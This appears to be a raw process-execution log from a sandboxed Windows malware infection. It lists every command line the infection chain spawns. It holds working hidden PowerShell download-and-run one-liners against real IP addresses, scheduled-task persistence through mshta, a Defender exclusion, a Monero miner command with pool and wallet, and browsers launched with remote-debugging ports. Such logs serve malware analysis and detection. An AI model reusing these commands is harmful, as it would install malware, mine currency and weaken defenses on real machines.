C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D64B.tmp\D64C.tmp\D64D.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\31xayw5v\31xayw5v.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES981.tmp" "c:\Users\Admin\AppData\Local\Temp\31xayw5v\CSC124C6D5AD9C742CBB436A684BDC2DF.TMP"
C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe
"C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn RDgJamaaXU3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn RDgJamaaXU3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE
"C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "cdohBmas9nm" /tr "mshta \"C:\Temp\ScsxbnLrP.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\ScsxbnLrP.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\ProgramData\dxukjxx\gmgc.exe
C:\ProgramData\dxukjxx\gmgc.exe
C:\Windows\System32\notepad.exe
--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 2356"
C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3932 -ip 3932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 788
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 2356"
C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5068 -ip 5068
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 792
C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe"
C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FAF5.tmp\FAF6.tmp\FAF7.bat C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 2356"
C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\2CsAdXyX\Anubis.exe""
C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe
"C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb2373cc40,0x7ffb2373cc4c,0x7ffb2373cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1904 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2148 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2248 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3128 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3260 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4456,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4508 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4632 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4636,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4832 /prefetch:8
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 2356"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5008 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe
"C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ffb22f346f8,0x7ffb22f34708,0x7ffb22f34718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5892 -ip 5892
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 808
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2508 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3880 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2292 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2388 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2420 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2496 /prefetch:2
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb22f346f8,0x7ffb22f34708,0x7ffb22f34718
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 2356"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1392,15895515533642466494,13465131436476367318,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 /prefetch:3
C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe
"C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb22f346f8,0x7ffb22f34708,0x7ffb22f34718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
